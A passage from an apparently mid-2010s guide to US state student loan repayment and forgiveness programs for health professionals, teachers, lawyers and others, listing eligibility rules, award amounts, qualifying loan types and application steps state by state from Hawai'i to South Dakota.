+years in areas where healthcare worker shortages are the most acute in Hawai’i. If eligible, you +can receive up to $30,000 per year to pay for your educational expenses. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Institutional loans + Consolidation loans + Private student loans +Next Steps +Complete and submit the Hawai’i State Loan Repayment Program application. +Idaho State Loan Repayment Program +To Be Eligible … +You must be a health practitioner in Idaho working for a nonprofit or public facility located in a +federally designated health profession shortage area. You must also: + Provide patients at or below 200% of the poverty guidelines with a schedule of discounts +and patients at or below 100% of the poverty guidelines with care for a nominal fee or +free of charge. + Accept Medicare, Medicaid, and the Children’s Health Insurance Program. + + Commit to working for 2 years at the practice in exchange for loan repayment, and agree +to significant repayment penalties if you don’t meet your service requirements. + Not be serving under another forgiveness or repayment program. + Agree to participate in a site visit with staff from the Bureau of Rural Health and Primary +Care during the service period. +You may receive from $5,000 to $25,000 per year for 2 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Institutional loans + Consolidation loans + Private student loans + State loans +Next Steps +You must complete a practitioner application and have your employer complete an application +as well. Both are located here. +Illinois Nurse Educator Loan Repayment Program +To Be Eligible … +You must be a U.S. citizen or eligible non-citizen, an Illinois resident, and a nurse educator who +meets licensing requirements of Illinois. You must have worked as a nurse educator instructing +practical or professional nurses in an approved Illinois institution for at least the past 12 +consecutive months prior to applying. +If you’re eligible, you can receive up to $5,000 per year for 4 years. +This program is accepting applications, but as of this writing, it has not yet been funded for the +2015 fiscal year. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + + Nursing Student Loans (NSL) + Supplemental Loans for Students (SLS) + Private student loans + Institutional student loans +All loans must be for nursing education expenses. +Next Steps +You can find various applications on the website linked in the title of this section. +Illinois Teachers Loan Repayment Program +To Be Eligible … +You must have received loan forgiveness through the federal Teacher Loan Forgiveness +Program and be a U.S. citizen and resident of Illinois. You must work for 5 years teaching in an +elementary or secondary school designated as a low-income school, or you must work full time +for 2 years in a child care facility that serves a low-income area in Illinois. +Eligible borrowers may receive up to $5,000. +Loans That Qualify + Stafford loans +Next Steps +You can find directions on how to apply to this forgiveness plan here. +Illinois Veterans’ Home Nurse Loan Repayment Program +To Be Eligible … +You must be a licensed nurse practicing and residing in Illinois at an Illinois veterans’ home. +If you’re eligible, you can receive up to $5,000 for up to 4 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Nursing Student Loans (NSL) + Supplemental Loans for Students (SLS) + Private student loans + Institutional loans + + Perkins loans + State loans +You must have borrowed loans for nursing education expenses. +Next Steps +You can find applications for this forgiveness plan here. +Justice Richard M. Givan Loan Repayment Assistance Program (Indiana) +To Be Eligible … +You must be a law graduate employed with a nonprofit organization dedicated to serving the +civil legal needs of low-income individuals and families in Indiana. Your annual income cannot +exceed $50,000. +You may receive a loan of up to $5,000 per year for your service, which is forgiven at the end of +a full year of service. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Private student loans + Institutional loans + Perkins loans + State loans +Next Steps +Complete the application at the site linked above. +Iowa Health Care Professional Loan Repayment Program +To Be Eligible … +You must be an osteopathic doctor, physician assistant, podiatrist, or physical therapist +practicing in high-need communities in Iowa for up to 4 years. You must have graduated from +Des Moines University. +You may receive up to $50,000, which is paid annually at the end of each year of service. +Loans That Qualify + Stafford loans + Grad PLUS loans + + Consolidation loans +Next Steps +You must complete an application from Des Moines University’s website. +Iowa Registered Nurse And Nurse Education Loan Forgiveness Program +To Be Eligible … +You must be a registered nurse or nurse educator employed in Iowa or teaching in an eligible +Iowa school. You must be a “new” nurse who was not employed as a nurse educator or +registered nurse prior to July 1, 2007. +You may receive up to 20% of your total eligible federal student loan balance, but you cannot +exceed the average resident tuition rate for students attending Iowa’s Regent Universities for +the first year following graduation. For 2014, the maximum award was $6,658. You may not +receive this award for more than 5 consecutive years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans +Next Steps +You must reapply annually by completing the loan forgiveness portion of the Iowa Financial Aid +application. +Iowa Teacher Loan Forgiveness +To Be Eligible … +You must be a fully licensed instructional teacher whose first teaching position in Iowa began no +earlier than July 1, 2007. You must teach in a shortage subject area designated by the Iowa +Department of Education. +If you’re eligible, you can receive up to 20% of your total eligible student loan balance (including +principal and interest) per year. The maximum you can apply for is determined annually, but it +cannot exceed the average resident tuition rate established for students attending Iowa’s +Regent Universities for the first year following graduation. The maximum for 2014 graduates is +$6,658. +Loans That Qualify + Stafford loans + Consolidation loans +Next Steps + +Eligible borrowers can apply to this forgiveness program here. +Rural Iowa RN and PA Loan Repayment Program +To Be Eligible … +You must complete a service agreement to receive up to $4.000 per year toward your federal +student loans for up to 5 years. You must also: + Attend an eligible Iowa college or university. + Be enrolled full time in a graduate-level program that will qualify you for licensure to +practice as a nurse practitioner or physician assistant. + Receive a recommendation from your institution. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Federal Consolidation loans +Next Steps +You will need to apply annually with the Iowa College Student Aid Commission. +Teach Iowa Scholars Program +To Be Eligible … +You must graduate in the top 25% of all teacher preparation program graduates during an +academic year at a postsecondary institution and become a full-time teacher in an eligible +teaching field at a school or education agency. +You may receive up to $4,000 toward your student loan repayment for up to 5 consecutive +years of full-time employment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + Private student loans + State loans + + Institutional loans +Next Steps +You can find the application online. +Kansas Bridging Plan +To Be Eligible … +You must be a physician in a Kansas residency program in family practice, internal medicine, +pediatrics, or medicine/pediatrics. You must commit to practicing medicine after your residency +for 36 continuous months in a rural community in Kansas. +If you’re eligible, you can receive up to $26,000. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans +Next Steps +You can apply to this forgiveness plan here. +Kansas Rural Opportunity Zone Student Loan Repayment +To Be Eligible … +You must have become a resident of a Kansas rural opportunity zone after July 1, 2011, and +have an associate’s, bachelor’s, or post-graduate degree. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You can complete an application here. +Kansas State Loan Repayment Program + +To Be Eligible … +You must be an eligible health professional working in Kansas who commits to provide health +care services at an eligible site located in a federally designated health professional service +area for at least 2 years. Your employment must be at a public or nonprofit private agency of +facility. The practice site must maintain an open door to all residents regardless of their ability to +pay. +Eligible physicians and general or pediatric dentists may receive up to $25,000 annually for up +to 2 years. All other health professionals may receive up to $20,000 annually for up to 2 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + State loans +Next Steps +You can find details for applying to this forgiveness program in the link within the section title. +Kentucky State Loan Repayment Program +You must commit to 2 years of practicing at an eligible site that provides primary care services +to a health professions shortage area in Kentucky, accepts all forms of public assistance, offers +a sliding fee scale, and sees all patients regardless of ability to pay. +Physicians, dentists, and pharmacists may receive up to $80,000. Physician assistants, nurse +practitioners, and behavioral health practitioners may receive up to $40,000. Registered nurses +and registered dental hygienists may receive up to $20,000. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + State loans +Next Steps + +You may apply starting September 1 of each year. +Maine Dental Loan Repayment Program +To Be Eligible … +You must be a dentist practicing in eligible dental care facilities in underserved areas of Maine. +You must not be in a service agreement for loan repayment under the National Health Service +Corps. +You may receive up to $20,000 per year with a total award maximum of $80,000. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans +Next Steps +You may apply online. +Janet L. Hoffman Loan Assistance Program (Maryland) +To Be Eligible … +You must be a Maryland resident who graduated from a Maryland institution. You must also +work full time in public service in Maryland state or local government or nonprofit agencies in +Maryland. +You must work to serve low-income or underserved residents and must gross less than $60,000 +per year (if married, your combined gross cannot be more than $130,000). Nurse faculty must +gross less than $75,000 annually (if married, your combined gross cannot be more than +$160,000). Lawyers, nurses, nurse faculty members, licensed clinical counselors, physical and +occupational therapists, social workers, speech pathologists, and certain teachers are eligible. +If your total debt is $15,000 or less, you may receive up to $1,500 per year. If your total debt is +$15,001 to $40,000, you may receive up to $3,000 per year. If your total debt is $40,001 to +$75,000, you may receive up to $6,000 per year. And if your total debt is over $75,000, you may +receive up to $10,000 per year. Regardless of your total debt, you can receive the indicated +amount for up to 3 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + + Private student loans +Next Steps +You can find application forms on the website linked in the title of this section. You can also +contact their office for paper applications. +Maryland Dent-Care Loan Assistance Repayment Program +To Be Eligible … +You must be a dentist in Maryland treating the most vulnerable populations. You must serve for +3 years full time at an eligible site and agree to treat a minimum of 30% MMAP recipients as a +portion of your total patient population. +You will receive $23,740 per year toward student loan repayment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + State loans + Private loans + Institutional loans +Next Steps +You can find the application and support materials here. +Maryland Loan Assistance Repayment Program +To Be Eligible … +You must be a primary care physician (including medical residents completing residency) in one +of the below specialties. You must also commit to practice for a period of 2 to 4 years at an +eligible practice site operated as a public clinic by any federal, state, local government, or +nonprofit that treats all patients regardless of ability to pay and is located in a Health +Professional Shortage Areas (HPSA) in Maryland. + General internal medicine + Family medicine + General pediatrics + Obstetrics and gynecology + + General psychiatry +Your award may not exceed $100,000 for your total service. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans +Next Steps +You must complete an application with Maryland’s Department Of Health And Mental Hygiene. +Nancy Grasmick Teacher Award (Maryland) +To Be Eligible … +You must be an eligible teacher who has taught in Maryland for the past 2 years. You will need +to meet the general requirements of the Janet L. Hoffman Loan Assistance Program (also listed +in this guide) and teach in science, engineering, or math OR teach in a school in which at least +75% of students are in the free meal program for 2 years AND have received the highest +performance evaluation rating for the most recent year. +You must gross less than $60,000 per year (if married, your combined gross cannot be more +than $130,000). +If your total debt is $15,000 or less, you may receive up to $1,500 per year. If your total debt is +$15,001 to $40,000, you may receive up to $3,000 per year. If your total debt is $40,001 to +$75,000, you may receive up to $6,000 per year. And if your total debt is over $75,000, you may +receive up to $10,000 per year. Regardless of your total debt, you can receive the indicated +amount for up to 3 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + Private student loans +Next Steps +You can find application forms on the website linked in the title of this section. You can also +contact their office for a paper application. +Massachusetts Loan Repayment Program + +To Be Eligible … +You must be a qualified health professional as determined by Massachusetts and employed at a +public or nonprofit health care organization located in a federally designated health professional +shortage area. +You may receive up to $25,000 per year and up to $50,000 total for 2 years if you’re eligible. +Your profession will determine your award amount. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +The application for this repayment program is here. +Michigan State Loan Repayment Program +To Be Eligible … +You must be a Michigan health professional working at an eligible site in a health professional +shortage area full time. You will need to commit to serving for 2 consecutive years at a time to +receive up to $200,000 to repay your student loans over the course of 8 years. +Eligible health professionals are: + Dentists: DDS or DMD + Physicians: MD or DO (Family Practice, Internal Medicine, OB/GYN, Pediatrics, +Geriatrics) + Physician Assistants (Primary Care, including the same specialties as MDs and DOs) + Nurse Practitioners (Primary Care, including the same specialties as MDs and DOs) + Certified Nurse Midwives + Psychiatrists + Clinical or Counseling Psychologists (Ph.D.) + Licensed Professional Counselors (Ph.D./Masters) + Marriage and Family Therapists (Ph.D./Masters) + Psychiatric Nurse Specialists (Masters) + Clinical Social Workers (Masters) + + Mental Health Counselors (Masters) +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + State loans + Institutional loans + Private loans +Next Steps +You will find application information here. +Allied Health Care Faculty Minnesota Loan Forgiveness Program +To Be Eligible … +You must be completing your final year of a master’s or doctoral program that prepares you to +become an allied health care educator in Minnesota. You must plan to teach at least 12 credit hours +or 720 hours per year for a minimum of 3 years in a postsecondary allied health care program. +You may receive up to $6,750, not to exceed $27,000, total for the maximum 4-year period. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +The application process is handled by WebGrants at the Minnesota Department of +Health.Dedicated Minnesota Dentists Dental Education Loan Repayment for Service +To Be Eligible … + +You must be a Minnesota dentist practicing in a health profession shortage area for 5 years to +be eligible for up to $200,000 in loan repayment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You can begin the application process here. +Minnesota Loan Forgiveness Program +To Be Eligible … +You must be an eligible health professional (see site linked in the title of this section for more +details) committed to a minimum of 3 years of service. +You may receive up to $25,000 per year for a minimum 3-year commitment and a maximum of +4 years. The amount you receive depends on your field and where you practice. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans +Next Steps +Applications are accepted only during certain times. If they are currently being accepted, you +can find them within the career-specific pages on the webpage linked in the title of this section. +Minnesota Loan Repayment Assistance Program for Law +To Be Eligible … +You must have graduated from a Minnesota law school or from any ABA-accredited law school +if employed at a qualified Minnesota agency full time. You may receive between 80% and 95% +of your student loan payments. +Loans That Qualify + + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Institutional loans + State loans + Private student loans +Next Steps +You will find application materials here. +Minnesota Nurse Loan Forgiveness Program +To Be Eligible … +You must be in your final year of a qualified nursing program and commit to working full time for +at least 3 years in a licensed nursing home or intermediate care facility for persons with +development disabilities in Minnesota. +You may receive up to $3,750 per year for no more than 4 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +The application process is handled by WebGrants at the Minnesota Department of Health. +Minnesota Rural Midlevel Practitioner Loan Forgiveness Program +To Be Eligible … +You must be a midlevel practitioner student, which includes Nurse Practitioners, Certified Nurse +Midwives, Nurse Anesthetists, Advanced Clinical Nurse Specialists, and Physician Assistants. +You must submit your application while completing your final year of an initial licensure +preparing midlevel practitioner program. + +You must commit to practicing full time for at least 3 years in a designated rural area but no +more than 4 years. You may receive up to $6,750 per year for up to 4 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +The application process is handled by WebGrants at the Minnesota Department of Health. +Minnesota Rural Pharmacist Loan Forgiveness Program +To Be Eligible … +You must be in your final year of pharmacy school or residency training when you apply. You +must plan to practice full time for a minimum of 3 years in a designated rural area. +You may receive up to $16,000, not to exceed $64,000 total, for the maximum 4-year period. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +The application process is handled by WebGrants at the Minnesota Department of Health. +Minnesota Rural Physician Loan Forgiveness Program +To Be Eligible … +You must be an eligible primary care medical resident (family practice, obstetrics and +gynecology, pediatrics, internal medicine, and psychiatry) who commits to serving for at least 3 +years in an underserved rural community in Minnesota. + +You may receive up to $25,000 per year for a maximum of $100,000 over 4 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +The application process is handled by WebGrants at the Minnesota Department of Health. +Minnesota Urban Physician Loan Forgiveness Program +To Be Eligible … +You must be an eligible primary care medical resident (family practice, obstetrics and +gynecology, pediatrics, internal medicine, and psychiatry) who commits to serving for at least 3 +years in an underserved urban community in Minnesota. +You may receive up to $25,000 per year for a maximum of $100,000 over 4 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +The application process is handled by WebGrants at the Minnesota Department of Health. +Mississippi Teacher Loan Repayment Program +To Be Eligible … +You must be currently holding a Mississippi Alternate Route Teaching License and a teaching +position in a Mississippi public school district located in a critical teacher or subject shortage +area. You must not currently be in default or delinquent on any federal, state, or local + +educational loan and not have received funds from the Critical Needs Teacher Loan Scholarship +Program or the William Winter Teacher Scholar Loan Program. +If you’re eligible, you can receive up to $3,000 annually for up to 4 years. +Loans That Qualify + Stafford loans + Consolidation loans + Private student loans +Your loans must be for your undergraduate education. +Next Steps +You can find the application for this repayment program here. +Missouri Health Professional State Loan Repayment Program +To Be Eligible … +You must be a licensed health professional in Missouri who agrees to work for 2 years in a +federally designated health professional shortage area. +You may receive up to $50,000 for your 2-year commitment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans + State loans + Institutional loans +Next Steps +You will need to apply with the Missouri Department of Health and Senior Services. +Montana NHSC Student Loan Repayment Program +To Be Eligible … +You must be an eligible health care professional who is unable to receive NHSC funding. +Eligible health care professionals are: + + Physicians—internal medicine, geriatrics, pediatrics, psychiatry, obstetrics/gynecology, +or family medicine (osteopathic general practice) + Physician assistant or nurse practitioner—adult, psychiatry/mental health, family, +geriatrics, pediatrics, women’s health + Primary care registered nurse + Certified nurse midwife + Psychiatrist (MD/DO) + Psychiatric nurse specialist + Clinical or counseling psychologist + Licensed professional counselor + Licensed clinical social worker + Marriage and family therapist + Dentist (DDS/DMD) + Registered dental hygienist + Pharmacist +You may receive up to $15,000 per year for 2 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSLs) + Private student loans +Next Steps +You can download the application form here. + +Montana Quality Educator Loan Assistance Program +To Be Eligible … +You must be a full-time educator with a valid license or a licensed professional providing +services to students in a school district, education cooperative, the Montana School for the Deaf +and Blind, the Montana Youth Challenge Program, or a state youth correctional facility. You +must be teaching at an “impacted” school (view the link in this section’s headline for the +definition of “impacted”) and in an academic area impacted by critical educator shortages. +If you’re eligible, you can receive up to $3,000 per year for up to 4 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans +Next Steps +You can find the application to this assistance program here. (An account is required to access +the site.) +Nebraska Student Loan Repayment Program +To Be Eligible … +You must be a qualified health professional who commits to practicing for 3 years in a state- +designated shortage area. +You may receive up to $40,000 per year toward student loan repayment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + Institutional loans + State loans +Next Steps + +You will need to apply with the Nebraska Department of Health and Human Services. +Nevada Health Service Corps +To Be Eligible … +You must be a health professional who meets licensure standards in Nevada with no restrictions +upon your DEA certificate. You will need to serve in an assigned community for a contractually +specified period of time, usually 2 years of full-time service. +Eligible professionals are: + MD Doctors of Allopathic Medicine + DO Doctors of Osteopathic Medicine + DD General Practice Dentists + NP Primary Care Certified Nurse Practitioners + NM Certified Nurse-Midwives + PA Primary Care Physician Assistants + DH Registered Clinical Dental Hygienists + CP Clinical or Counseling Psychologists + CSW Clinical Social Workers + PNS Psychiatric Nurse Specialists + MHC Mental Health Counselors + LPC Licensed Professional Counselors + MFT Marriage and Family Therapists +Award amounts are based on each individual’s application. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + Institutional loans + + State loans +Next Steps +You must apply with the Nevada State Office of Rural Health. +New Jersey Primary Care Physician And Dentist Loan Redemption Program +To Be Eligible +You must be a New Jersey resident who is licensed to practice primary care medicine, dentistry, +or another primary care profession in a state designated underserved area. +You may receive up to: + 18% of your total balance (up to $21,600) for your first full year of service. + 26% of your total balance (up to $31,200) for your second full year of service. + 28% of your total balance (up to $33,600) for your third full year of service. + 28% of your total balance (up to $33,600) for your fourth full year of service. +Loans That Qualify + Stafford loans + Graduate PLUS loans + Perkins loans + Consolidation loans + Federally Insured Student Loans (FISL) + Health Education Assistance Loans (HEAL) + Health Professions Student Loans (HPSL) + New Jersey College Loan to Assist State Students (NJCLASS) + Other New Jersey state loans + Supplemental Loans for Students (SLS) +Next Steps +Learn more about the application process here. +New Mexico Health Professional Loan Repayment Program +To Be Eligible … +You must be a New Mexico health professional and make a 2-year service commitment to +practice full time in a designated medical shortage area in New Mexico in return for funds to +repay your student loans. + +Eligible health occupations: + Advance practice nurse + Allied health care provider + Allopathic physician + Dentist + Optometrist + Osteopathic physician + Physician assistant + Pediatrician +If eligible, you may receive up to $35,000 per year. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Federal consolidation loans +Next Steps +The application is available via the link in this section’s headline between March 15 and May 1 +every year. +New Mexico Teacher Loan Repayment Program +To Be Eligible … +You must be a U.S. citizen and New Mexico resident for at least 12 consecutive months, be a +licensed New Mexico teacher, and be employed at a public school not meeting acceptable +academic proficiency levels. +This program provides funds to repay your student loan principal and reasonable interest +accrued on loans obtained from the federal government for teacher education purposes. If you +are eligible, you will be required to sign a contract to commit to serve at eligible employment +sites for 2 school years. +Loans That Qualify + Stafford loans + Consolidation loans + Perkins loans + +Next Steps +The application is available via the link in this section’s headline between March 15 and May 1 +every year. +Public Service Law Loan Repayment Program +To Be Eligible … +You must be licensed to practice law in New Mexico as an attorney and shall declare intent to +practice as an attorney in public service employment at an eligible site for at least 3 years and +make less than $55,000. +You may receive up to $7,200 per year. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + State loans + Institutional loans + Private loans +Next Steps +You must complete an application and submit it to the New Mexico Higher Education +Department. +District Attorney And Indigent Legal Services Attorney Loan Forgiveness Program (New +York) +To Be Eligible … +You must be a legal resident of New York for 1 year, a U.S. citizen or eligible non-citizen, an +eligible attorney, and not be serving for the John R. Justice Student Loan Repayment Program. +New York funding determines the annual amount each year, but you can receive no more than +$20,400. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + + NY student loans + Private student loans +Next Steps +You can find the application for this program here. +New York Regents Physician Loan Forgiveness Award Program +To Be Eligible … +You must be a primary care physician licensed to practice medicine in New York and have +completed your professional residency within 5 years of initially applying for the award. You +must be a New York resident and not be a recipient of the Federal Loan Physician Repayment +Program. You must commit to serve in a specific underserved area of New York state for at +least 24 months. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You will need to complete the application found on this this website. +New York State Licensed Social Worker Loan Forgiveness Program +To Be Eligible … +You must be a legal resident of New York for 1 year, a U.S. citizen or eligible non-citizen, a +social worker professionally licensed in New York, and have at least 1 year of full-time qualified +service in a critical service area. +Eligible borrowers can receive up to $6,500 per year, with a maximum of their total qualified +loan debt or $26,000—whichever is less. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + NY student loans + Private student loans + +Next Steps +You can find the application for this program on this website. +New York State Young Farmers Loan Forgiveness Incentive Program +To Be Eligible … +You must have received your undergraduate degree from an approved New York state college +or university and agree to operate a farm in New York state full time for 5 years. You must apply +for this program within 2 years of your graduation. +You may receive up to $10,000 per year for a maximum of $50,000 over the 5-year +commitment. +Loans That Qualify + Stafford loans + Graduate PLUS loans + Consolidation loans + New York state loans + Private loans +Next Steps +When it is available each year, you can find the application for this program at the link above. +Nursing Faculty Loan Forgiveness Incentive Program (New York) +To Be Eligible … +You must be a legal resident of New York for 1 year, a U.S. citizen or eligible non-citizen, and a +registered nurse professionally licensed in New York. You must also have a master’s degree in +nursing or a doctoral degree that qualifies you as nurse faculty, prior experience as a registered +nurse, and qualified service (see site for more details). +Eligible borrowers can receive up to $8,000 per year, with a maximum total of $40,000. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + NY student loans + Private student loans +Next Steps + +You can find applications on the website linked in the title of this section; however, applications +are only available in August. +North Dakota Loan Repayment—State Program Dentists +To Be Eligible … +You must be a North Dakota dentist practicing in an area with a defined need and be willing to +enter into a 4-year, non-renewable contract with the North Dakota Department of Health in +exchange for up to $80,000 of student loan repayment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You must complete an application. +North Dakota Loan Repayment—State Program Physicians +To Be Eligible … +You must be a North Dakota physician and be willing to enter into a 2-year, non-renewable +contract with the North Dakota Department Of Health in a selected community to provide +service in exchange for up to $90,000 of student loan repayment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You must complete an application and a community participant form. +North Dakota Loan Repayment—State Program Nurse Practitioners, Physician +Assistants, and Certified Nurse Midwives +To Be Eligible … +You must be a North Dakota nurse practitioner, physician assistant, or a certified nurse midwife +in an area with a defined health professional need and be willing to enter into a 2-year, non- + +renewable contract with the North Dakota Department of Health in a selected community to +provide service in exchange for up to $30,000 of student loan repayment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You must complete an application and a community participant form. +North Dakota Science, Technology, Engineering, And Mathematics (STEM) Occupations +Student Loan Program +To Be Eligible … +You must be a North Dakota college graduate with a cumulative GPA of 2.5 or higher and +employed in a board-approved STEM occupation for 12 months. +If you are eligible, you can receive up to $1,500 per year, with a maximum total of $6,000. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Loans from the Bank of North Dakota +Next Steps +You can find details to apply here. +North Dakota Teacher Shortage Loan Forgiveness Program +To Be Eligible … +You must teach in North Dakota at a grade level and/or in a content area identified as having +teacher shortages. Eligible borrowers can receive up to $1,000 per year, with a maximum total +of $3,000. +Loans That Qualify + Stafford loans + Consolidation loans + + Perkins loans + Loans from the Bank of North Dakota +Next Steps +You can find the application for this program here. +North Dakota’s Veterinarian Loan Repayment Program +To Be Eligible … +You must be a veterinarian who provides food animal veterinary medicine services to defined +needs areas in North Dakota. You must also complete a contract to provide the veterinary +services for 2, 3, or 4 years. +Eligible borrowers can receive up to $15,000 per year for the first 2 years of service and then up +to $25,000 per year for their third and fourth years of service. +Loans That Qualify + Stafford loans + Student PLUS loans + Consolidation loans + Private student loans + Institutional loans + Perkins loans +You must have borrowed these loans for veterinary education. +Next Steps +You can apply for this program here. +Oklahoma Dental Loan Repayment Program +To Be Eligible … +You must be a dentist in Oklahoma practicing in an underserved metro area or rural area. In +addition, at least 30% of your patients must be Medicare recipients. +Eligible borrowers may receive up to $25,000 per year for 2 to 5 years. However, the availability +of this program is very limited. Only five dentists receive this award per year. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + + Perkins loans + Private student loans +Next Steps +You can find the application for this program here. +Oregon Partnership State Loan Repayment Program +To Be Eligible … +You must be a primary care provider working in an HPSA-designated service site that is willing +to provide 50% of the total loan repayment award plus a 10% administrative fee. You will need +to sign a minimum 2-year service obligation with the option of 1 to 2 years beyond the initial +obligation. +Eligible borrowers can receive up to $35,000 or 25% of their qualifying debt (whichever is +smaller) disbursed every 6 months for their 2 years of service. If you opt to extend your service +obligation, you may be able to receive additional student loan repayment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + Consolidation loans + Perkins loans + Private student loans + State loans +Next Steps +You can find the two applications for this program here. +Pennsylvania Primary Care Loan Repayment Program +To Be Eligible… +You must be an eligible primary care provider serving medically underserved populations in +Pennsylvania. Eligible professions include: + Physicians—family medicine, general internal medicine, pediatrics, geriatrics, +obstetrics/gynecology, and psychiatry + Certified Registered Nurse Practitioners—adult, family medicine, pediatrics, geriatrics, +women’s health, and mental health/psychiatry + General dentists + + Registered dental hygienists + Certified nurse midwives + Physician assistants—adult, family medicine, pediatrics, geriatrics, women’s health, and +mental health/psychiatry + Licensed clinical social worker (employed at a primary care clinic only) + Licensed professional counselors (employed at a primary care clinic only) + Marriage and family therapists (employed at a primary care clinic only) + Psychologists (employed at a primary care clinic only) +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You can access the application here. +Rhode Island Educational Loan Repayment Program For Primary Care Providers +To Be Eligible … +You must be a licensed physician, nurse practitioner, or physician’s assistant newly recruited to +practice in Rhode Island and work in family medicine, internal medicine, or pediatrics. +Physicians may receive up to $20,000 per year for 4 years, for a maximum of $80,000. Nurse +practitioners and physicians assistants can receive up to $10,000 per year for 4 years, for a +maximum of $40,000. The amount you receive cannot exceed 50% of your educational debt. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans + +Next Steps +There are separate forms for each vocation. You can download the appropriate one for you from +the link within the title of this section. +RISLA Loan Forgiveness For Internships +To Be Eligible … +You must have non-federal student loans held by the Rhode Island Student Loan Authority +(RISLA). You must complete an eligible academic internship worth at least three credit hours +through an accredited higher education institution and must graduate. +Only students at Rhode Island schools or residents of Rhode Island attending out-of-state +schools qualify. Independent studies and practicums that are required for a particular major do +not qualify. +The internship must be after May 1, 2013, may be paid or unpaid, and can be done in any state. +You may receive $2,000 for one three-credit internship after graduation. You can only apply +once. +Loans That Qualify + Non-federal loans (state loans, private loans, etc.) +Next Steps +You can download your application here. +RISLA Nurse Educators Loan Forgiveness Program +To Be Eligible … +You must be a nurse educator hired on or after April 1, 2012, teaching full or part time at a +degree-granting accredited institution in Rhode Island licensed by the Rhode Island Board of +Nursing Registration. +You may receive up to $5,000 annually for up to 4 years. Part-time teachers would have awards +prorated. +RISLA is awarding up to $240,000 on a first-come, first-served basis. +Loans That Qualify + Stafford loans + Grad or Parent PLUS loans + Consolidation loans + Private student loans + Nursing loans + +Next Steps +You can find the application here. +South Dakota Recruitment Assistance Program +To Be Eligible… +You must be a qualifying physician, dentist, physician assistant, nurse practitioner, or nurse +midwife practicing in an eligible rural community in South Dakota, and be willing to enter into a +service contract for 3 years. +The payment incentive for qualifying physicians and dentists is equal to twice the University of +South Dakota School of Medicine resident tuition for the 4 most recently completed academic +years—which is currently $172,172. +The payment incentive for a qualifying physician assistant, nurse practitioner, or nurse midwife +is equal to twice the University of South Dakota resident tuition for physician assistant studies +for the 3 most recently completed academic years—which is currently $40,149. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +For more information, contact Jacob Parsons at the Department of Health, Office of Rural +Health, 600 E. Capitol, Pierre, SD 57501; phone 800.738.2301 or 